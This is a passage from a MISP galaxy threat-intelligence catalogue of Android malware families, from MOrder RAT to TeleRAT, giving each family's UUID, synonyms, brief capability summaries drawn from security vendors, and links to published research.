- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf - webarchive
- https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681 - webarchive
- https://www.broadcom.com/support/security-center/protection-bulletin/moqhao-malware-continues-to-target-mobile-users-in-europe - webarchive
- https://www.xanhacks.xyz/p/moqhao-malware-analysis - webarchive
- https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/ - webarchive
- https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf - webarchive
- https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MOrder RAT
Internal MISP references
UUID f91f27ad-edcd-4e3d-824e-23f6acd81a7b which can be used as unique global reference for MOrder RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Mudwater
Internal MISP references
UUID 9a8a5dd0-c86e-40d1-bc94-51070447c907 which can be used as unique global reference for Mudwater in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MysteryBot
MysteryBot is an Android banking Trojan with overlay capabilities that support Android 7/8; it also provides other features such as key logging and ransomware functionality.
Internal MISP references
UUID 0a53ace4-98ae-442f-be64-b8e373948bde which can be used as unique global reference for MysteryBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Nexus
Internal MISP references
UUID fe0b4e6e-268e-4c63-a095-bf1ddff95055 which can be used as unique global reference for Nexus in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
OmniRAT
Internal MISP references
UUID ec936d58-6607-4e33-aa97-0e587bbbdda5 which can be used as unique global reference for OmniRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat - webarchive
- https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/ - webarchive
- https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Android.OmniRAT - webarchive
- https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Oscorp
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Oscorp.
| Known Synonyms |
|---|
| UBEL |
Internal MISP references
UUID 8d383260-102f-46da-8cc6-7659cbbd9452 which can be used as unique global reference for Oscorp in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PackChat
Internal MISP references
UUID b0f56103-1771-4e01-9ed7-44149e39ce93 which can be used as unique global reference for PackChat in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PhantomLance
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PhantomLance.
| Known Synonyms |
|---|
| PWNDROID1 |
Internal MISP references
UUID a73375a5-3384-4515-8538-b598d225586d which can be used as unique global reference for PhantomLance in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance - webarchive
- https://securelist.com/apt-phantomlance/96772/ - webarchive
- https://threatvector.cylance.com/en_us/home/mobile-malware-and-apt-espionage-prolific-pervasive-and-cross-platform.html - webarchive
- https://securelist.com/it-threat-evolution-q2-2020/98230 - webarchive
- https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/mobile-malware-report.pdf - webarchive
- https://drive.google.com/file/d/1m0Qg8e1Len1My6ssDy6F0oQ7JdkJUkuu/view - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Phoenix
Internal MISP references
UUID b5d57344-0486-4580-a437-54c61cb0bf4d which can be used as unique global reference for Phoenix in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PhoneSpy
According to Zimperium, PhoneSpy is a spyware aimed at South Korean residents with Android devices.
Internal MISP references
UUID ff00bbb6-6856-4cf5-adde-d1cc536dd0e2 which can be used as unique global reference for PhoneSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PINEFLOWER
According to Mandiant, PINEFLOWER is an Android malware family capable of a wide range of backdoor functionality, including stealing system information, logging and recording phone calls, initiating audio recordings, reading SMS inboxes, and sending SMS messages. The malware also has features to facilitate device location tracking; deleting, downloading, and uploading files; reading connectivity state, speed, and activity; and toggling Bluetooth, Wi-Fi, and mobile data settings.
Internal MISP references
UUID a17a7c5d-0a8f-42e7-b4c9-63c258267776 which can be used as unique global reference for PINEFLOWER in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PixPirate
According to PCrisk, PixPirate is a dangerous Android banking Trojan that has the capability to carry out ATS (Automatic Transfer System) attacks. This allows threat actors to automatically transfer funds through the Pix Instant Payment platform, which numerous Brazilian banks use.
In addition to launching ATS attacks, PixPirate can intercept and delete SMS messages, prevent the uninstallation process, and carry out malvertising attacks.
Internal MISP references
UUID cdf707bd-a8b0-4ee3-917d-a56b11f30206 which can be used as unique global reference for PixPirate in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PixStealer
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PixStealer.
| Known Synonyms |
|---|
| BrazKing |
Internal MISP references
UUID 5d047596-eb67-4fed-b41d-65fa975150c5 which can be used as unique global reference for PixStealer in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.pixstealer - webarchive
- https://research.checkpoint.com/2021/pixstealer-a-new-wave-of-android-banking-trojans-abusing-accessibility-services/ - webarchive
- https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PjobRAT
Internal MISP references
UUID 6fa6c769-2546-4a5c-a3c7-24dda4ab597d which can be used as unique global reference for PjobRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.pjobrat - webarchive
- https://cybleinc.com/2021/06/22/android-application-disguised-as-dating-app-targets-indian-military-personnel/ - webarchive
- https://mp.weixin.qq.com/s/VTHvmRTeu3dw8HFyusKLqQ - webarchive
- https://labs.k7computing.com/?p=22537 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PlainGnome
According to Lookout, PlainGnome consists of a two-stage deployment in which a very minimal first stage drops a malicious APK once it’s installed. The code of PlainGnome’s second stage payload evolved significantly from January 2024 through at least October. In particular, PlainGnome’s developers shifted to using Jetpack WorkManager classes to handle data exfiltration, which eases development and maintenance of related code. In addition, WorkManager allows for specifying execution conditions. For example, PlainGnome only exfiltrates data from victim devices when the device enters an idle state. This mechanism is probably intended to reduce the chance of a victim noticing the presence of PlainGnome on their device. As opposed to the minimalist first (installer) stage, the second stage carries out all surveillance functionality and relies on 38 permissions.
Internal MISP references
UUID d67bedfc-11d6-4784-83f2-9a38887e1298 which can be used as unique global reference for PlainGnome in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Podec
Internal MISP references
UUID 82f9c4c1-2619-4236-a701-776c6c781f45 which can be used as unique global reference for Podec in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
X-Agent (Android)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular X-Agent (Android).
| Known Synonyms |
|---|
| Popr-d30 |
Internal MISP references
UUID 0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf which can be used as unique global reference for X-Agent (Android) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Fake Pornhub
Internal MISP references
UUID 3272a8d8-8323-4e98-b6ce-cb40789a3616 which can be used as unique global reference for Fake Pornhub in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Premier RAT
Internal MISP references
UUID 661471fe-2cb6-4b83-9deb-43225192a849 which can be used as unique global reference for Premier RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Princess
Internal MISP references
UUID 2665959a-8686-44b3-ad01-5ef21a5cac1b which can be used as unique global reference for Princess in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Rafel RAT
Internal MISP references
UUID cdaa0a6d-3709-4e6f-8807-fff388baaba0 which can be used as unique global reference for Rafel RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RambleOn
Internal MISP references
UUID 41ab3c99-297c-465c-8375-3e9f7ce4b996 which can be used as unique global reference for RambleOn in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Rana
Internal MISP references
UUID 65a8e406-b535-4c0a-bc6d-d1bec3c55623 which can be used as unique global reference for Rana in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RatMilad
RatMilad, a newly discovered Android spyware, has been stealing data from mobile devices in the Middle East. The malware is spread through links on social media and pretends to be applications for services like VPN and phone number spoofing. Unwary users download these trojan applications and grant access to malware.
Internal MISP references
UUID 542c3e5e-2124-4c36-af05-65893974d5ce which can be used as unique global reference for RatMilad in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RatOn
According to ThreatFabric, this RAT can perform NFC relay attacks and has Automated Transfer System (ATS) capabilities.
Internal MISP references
UUID 0bc2b50d-9627-4eaf-a320-9d3f0f53981a which can be used as unique global reference for RatOn in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Raxir
Internal MISP references
UUID f5cabe73-b5d6-4503-8350-30a6d54c32ef which can be used as unique global reference for Raxir in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RedAlert2
RedAlert 2 is a new Android malware used by an attacker to gain access to the login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server. The malware also has the ability to block incoming calls from banks, to prevent the victim from being notified. As a distribution vector, RedAlert 2 uses third-party app stores and imitates real Android apps like Viber and WhatsApp, or fake Adobe Flash Player updates.
Internal MISP references
UUID e9aaab46-abb1-4390-b37b-d0457d05b28f which can be used as unique global reference for RedAlert2 in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2 - webarchive
- https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Remo
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Remo.
| Known Synonyms |
|---|
| PlayPraetor |
Internal MISP references
UUID 74450154-9b2d-434c-b1d7-846bfb8d1de3 which can be used as unique global reference for Remo in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.remo - webarchive
- https://cyble.com/blog/new-remo-android-banking-trojan-targets-over-50-banking-applications-and-crypto-wallets/ - webarchive
- https://cdn.prod.website-files.com/66fbdb04ee8bb0436308fc15/67cec4cfaddc1d68628d2ef6_CTM360%20Report_%20PlayPraetor%20Trojan%20-%20Clear%20TLP%20(2).pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RemRAT
Internal MISP references
UUID 23809a2b-3c24-41c5-a310-2b8045539202 which can be used as unique global reference for RemRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Retefe (Android)
The Android app used by Retefe is an SMS stealer, used to forward mTAN codes to the threat actor. Furthermore, a bank logo is added to the specific Android app to trick users into thinking it is a legitimate app. Moreover, if the target is not a real victim, the download link does not point to the malicious APK but to the real 'Signal Private Messenger' app, so that phone does not get infected.
Internal MISP references
UUID 22ef1e56-7778-41d1-9b2b-737aa5bf9777 which can be used as unique global reference for Retefe (Android) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe - webarchive
- http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html - webarchive
- http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html - webarchive
- http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html - webarchive
- http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/ - webarchive
- https://www.govcert.admin.ch/blog/33/the-retefe-saga - webarchive
- http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Revive
According to PCrisk, Revive is the name of a banking Trojan targeting Android users (customers of a specific Spanish bank). It steals sensitive information. Cybercriminals use Revive to take ownership of online accounts using stolen login credentials. This malware abuses Accessibility Services to perform malicious activities.
Internal MISP references
UUID 25669934-14bf-463f-bcae-c59c590c3bf8 which can be used as unique global reference for Revive in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Riltok
Internal MISP references
UUID d7b347f8-77a5-4197-b818-f3af504da2c1 which can be used as unique global reference for Riltok in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Roaming Mantis
Internal MISP references
UUID 31d2ce1f-44bf-4738-a41d-ddb43466cd82 which can be used as unique global reference for Roaming Mantis in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis - webarchive
- https://systemweakness.com/a-strange-font-smishing-that-changes-behaviour-based-on-user-agent-and-abuses-duck-dns-1c1a45863ff7 - webarchive
- https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/ - webarchive
- https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/ - webarchive
- https://securelist.com/roaming-mantis-part-v/96250/ - webarchive
- https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/ - webarchive
- https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf - webarchive
- https://systemweakness.com/investigating-a-fake-mobile-payment-smishing-that-abuses-duck-dns-d07c72468ba8 - webarchive
- https://securelist.com/roaming-mantis-reaches-europe/105596/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Rogue
Internal MISP references
UUID 4b53480a-8006-4af7-8e4e-cc8727c62648 which can be used as unique global reference for Rogue in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Rootnik
Internal MISP references
UUID db3dcfd1-79d2-4c91-898f-5f2463d7c417 which can be used as unique global reference for Rootnik in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik - webarchive
- https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java - webarchive
- https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Salvador Stealer
According to ANY.RUN, this is a banking trojan that collects sensitive user information, including: registered mobile number, Aadhaar number, PAN card details, date of birth, and net banking user ID and password. It uses Telegram as C2.
Internal MISP references
UUID a815d079-3e70-4c51-9bf6-76217beb49fc which can be used as unique global reference for Salvador Stealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Sauron Locker
Internal MISP references
UUID a7c058cf-d482-42cf-9ea7-d5554287ea65 which can be used as unique global reference for Sauron Locker in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SharkBot
SharkBot is a piece of malicious software targeting Android Operating Systems (OSes). It is designed to obtain and misuse financial data by redirecting and stealthily initiating money transfers. SharkBot is particularly active in Europe (United Kingdom, Italy, etc.), but its activity has also been detected in the United States.
Internal MISP references
UUID 7b20fdb1-5aee-4f17-a88e-bcd72c893f0a which can be used as unique global reference for SharkBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.sharkbot - webarchive
- https://muha2xmad.github.io/malware-analysis/sharkbot/ - webarchive
- https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/ - webarchive
- https://bin.re/blog/the-dgas-of-sharkbot/ - webarchive
- https://services.google.com/fh/files/blogs/gcat_threathorizons_full_jul2023.pdf - webarchive
- https://www.cleafy.com/cleafy-labs/sharkbot-a-new-generation-of-android-trojan-is-targeting-banks-in-europe - webarchive
- https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html - webarchive
- https://blog.fox-it.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/ - webarchive
- https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/ - webarchive
- https://blog.fox-it.com/2022/09/02/sharkbot-is-back-in-google-play/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Shopper
Shopper/LeifAccess is a malicious Android app that uses Android's AccessibilityService to secretly control the device. It installs apps, leaves fake reviews, opens ads, and even registers users on various platforms. Disguised as a system app, it collects personal and device information and sends it to remote servers. The malware was most active in late 2019, especially in Russia, Brazil, and India.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Shopper.
| Known Synonyms |
|---|
| LeifAccess |
Internal MISP references
UUID e48ccf61-6c7b-400a-8c7f-2e8f3421f32e which can be used as unique global reference for Shopper in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SideWinder (Android)
SideWinder involved a fake VPN app for Android devices published on Google Play Store along with a custom tool that filters victims for better targeting.
Internal MISP references
UUID af929cac-e0c6-4a63-ac5a-02c4cbbab746 which can be used as unique global reference for SideWinder (Android) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SilkBean
Internal MISP references
UUID 00ab3d3b-dbbf-40de-b3d8-a3466704a1a7 which can be used as unique global reference for SilkBean in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Skygofree
Internal MISP references
UUID f5fded3c-8f45-471a-a372-d8be101e1b22 which can be used as unique global reference for Skygofree in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Slempo
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Slempo.
| Known Synonyms |
|---|
| SlemBunk |
Internal MISP references
UUID d87e2574-7b9c-4ea7-98eb-88f3e139f6ff which can be used as unique global reference for Slempo in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Slocker
Slocker, also known as Jisut and Pigetrl, is a screen locker that is distributed through Telegram groups.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Slocker.
| Known Synonyms |
|---|
| Jisut |
| Simple Locker |
Internal MISP references
UUID fe187c8a-25d4-4d30-bd43-efca18d527f0 which can be used as unique global reference for Slocker in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker - webarchive
- https://labs.bitdefender.com/2020/05/android-slocker-variant-uses-coronavirus-scare-to-take-android-hostage/ - webarchive
- https://www.bitdefender.com/en-us/blog/labs/android-slocker-variant-uses-coronavirus-scare-to-take-android-hostage - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SmsAgent
SMSAgent appears as a game application, but silently performs malicious routines in the background. It attempts to download other potentially malicious files from a remote server and sends out SMS or MMS messages that place expensive charges on the user's bill.
Internal MISP references
UUID ee42986c-e736-4092-a2f9-2931a02c688d which can be used as unique global reference for SmsAgent in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SMSspy
Internal MISP references
UUID 7a38c552-0e1a-4980-8d62-1aa38617efab which can be used as unique global reference for SMSspy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SoumniBot
Internal MISP references
UUID ed53cdaf-0649-4ca5-adcd-592a46f79da8 which can be used as unique global reference for SoumniBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
S.O.V.A.
Internal MISP references
UUID 2aa95661-b63a-432e-8e5e-74ac93b42d57 which can be used as unique global reference for S.O.V.A. in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.sova - webarchive
- https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly - webarchive
- https://blog.cyble.com/2021/09/14/deep-dive-analysis-of-s-o-v-a-android-banking-trojan/ - webarchive
- https://cryptax.medium.com/eyes-on-android-s-o-v-a-botnet-sample-fb5ed332d08 - webarchive
- https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html - webarchive
- https://blog.cyble.com/2023/03/09/nexus-the-latest-android-banking-trojan-with-sova-connections - webarchive
- https://muha2xmad.github.io/malware-analysis/sova/ - webarchive
- https://liansecurity.com/#/main/news/RWt_ZocBrFZDfCElFqw_/detail - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SpyBanker
Internal MISP references
UUID e186384b-8001-4cdd-b170-1548deb8bf04 which can be used as unique global reference for SpyBanker in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SpyC23
Internal MISP references
UUID 8fb4910f-e645-4465-a202-a20835416c87 which can be used as unique global reference for SpyC23 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SpyMax
SpyMax is a popular Android surveillance tool. Its predecessor, SpyNote, was one of the most widely used spyware frameworks.
Internal MISP references
UUID e1dfb554-4c17-4d4c-ac48-604c48d8ab0b which can be used as unique global reference for SpyMax in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.spymax - webarchive
- https://www.mobile-hacker.com/2025/06/05/analysis-of-spyware-that-helped-to-compromise-a-syrian-army-from-within/#google_vignette - webarchive
- https://labs.k7computing.com/index.php/spymax-a-fake-wedding-invitation-app-targeting-indian-mobile-users/ - webarchive
- https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html - webarchive
- https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions - webarchive
- https://www.group-ib.com/blog/craxs-rat-malware/ - webarchive
- https://www.zscaler.com/blogs/research/android-spyware-targeting-tanzania-premier-league - webarchive
- https://twitter.com/malwrhunterteam/status/1250412485808717826 - webarchive
- https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SpyNote
According to Cleafy, SpyNote abuses Accessibility services and other Android permissions in order to: Collect SMS messages and contacts list; Record audio and screen; Perform keylogging activities; Bypass 2FA; Track GPS locations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SpyNote.
| Known Synonyms |
|---|
| CypherRat |
Internal MISP references
UUID 31592c69-d540-4617-8253-71ae0c45526c which can be used as unique global reference for SpyNote in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote - webarchive
- https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan - webarchive
- https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html - webarchive
- https://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages - webarchive
- https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA - webarchive
- https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/ - webarchive
- https://www.intrinsec.com/wp-content/uploads/2024/11/TLP-CLEAR-PROSPERO-Proton66-Uncovering-the-links-between-bulletproof-networks.pdf - webarchive
- https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w - webarchive
- https://www.cleafy.com/cleafy-labs/spynote-continues-to-attack-financial-institutions - webarchive
- https://hunt.io/blog/caught-in-the-act-uncovering-spynote-in-unexpected-places - webarchive
- https://www.fortinet.com/blog/threat-research/android-spynote-moves-to-crypto-currencies - webarchive
- https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr - webarchive
- https://dti.domaintools.com/newly-registered-domains-distributing-spynote-malware/ - webarchive
- https://labs.k7computing.com/index.php/spynote-an-android-snooper/ - webarchive
- https://cocomelonc.github.io/book/2025/05/19/aiya-mmd-book.html - webarchive
- https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/ - webarchive
- https://www.group-ib.com/blog/craxs-rat-malware/ - webarchive
- https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/ - webarchive
- https://cryptax.medium.com/android-spynote-bypasses-restricted-settings-breaks-many-re-tools-8791b3e6bf38 - webarchive
- https://labs.k7computing.com/index.php/spynote-targets-irctc-users/ - webarchive
- https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn - webarchive
- https://www.intrinsec.com/prospero-proton66-tracing-uncovering-the-links-between-bulletproof-networks/ - webarchive
- https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions - webarchive
- https://medium.com/@mvaks/analysis-of-malicious-mobile-applications-impersonating-popular-polish-apps-olx-allegro-iko-7dab879a320d - webarchive
- https://ti.qianxin.com/blog/articles/Blade-hawk-The-activities-of-targeted-the-Middle-East-and-West-Asia-are-exposed/ - webarchive
- https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
StealthAgent
Internal MISP references
UUID 0777cb30-534f-44bb-a7af-906a422bd624 which can be used as unique global reference for StealthAgent in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Stealth Mango
Internal MISP references
UUID 7d480f11-3de8-463d-8a19-54685c8b9e0f which can be used as unique global reference for Stealth Mango in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Sturnus
According to ThreatFabric, Sturnus is a privately operated Android banking trojan. This malware supports a broad range of fraud-related capabilities, including full device takeover. A key differentiator is its ability to bypass encrypted messaging. By capturing content directly from the device screen after decryption, Sturnus can monitor communications via WhatsApp, Telegram, and Signal.
The trojan can harvest banking credentials through convincing fake login screens that replicate legitimate banking apps. In addition, it provides attackers with extensive remote control, enabling them to observe all user activity, inject text without physical interaction, and even black out the device screen while executing fraudulent transactions in the background—without the victim’s knowledge.
Internal MISP references
UUID 5bd9ebca-e0dd-4d68-8ac9-7a384415d6e2 which can be used as unique global reference for Sturnus in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Svpeng
Svpeng is a malicious banking trojan targeting Android devices, and it poses a significant threat to both mobile users and the developers of mobile banking apps. Svpeng has been active since around 2013. It primarily targets Android users, and its main objective is to steal sensitive financial information, particularly login credentials and personal data related to banking and financial apps. Svpeng typically spreads through malicious apps, phishing campaigns, or drive-by downloads.
Internal MISP references
UUID d99c0a47-9d61-4d92-86ec-86a87b060d76 which can be used as unique global reference for Svpeng in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Switcher
Internal MISP references
UUID e3e90666-bc19-4741-aca8-1e4cbc2f4c9e which can be used as unique global reference for Switcher in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TalentRAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TalentRAT.
| Known Synonyms |
|---|
| Assassin RAT |
Internal MISP references
UUID 46151a0d-aa0a-466c-9fff-c2c3474f572e which can be used as unique global reference for TalentRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TangleBot
Internal MISP references
UUID 1e37d712-df02-48aa-82fc-28fa80c92c2b which can be used as unique global reference for TangleBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TeleRAT
Internal MISP references
UUID e1600d04-d2f7-4862-8bbc-0f038ea683ea which can be used as unique global reference for TeleRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
